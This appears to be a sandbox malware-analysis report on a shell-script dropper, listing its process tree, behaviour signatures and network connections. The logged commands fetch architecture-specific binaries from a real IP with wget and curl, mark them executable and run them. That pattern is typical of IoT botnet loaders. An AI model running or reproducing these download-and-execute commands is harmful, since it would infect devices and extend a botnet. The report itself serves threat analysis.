| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
debian9-mipsel-20240226-en
Max time kernel
79s
Max time network
83s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |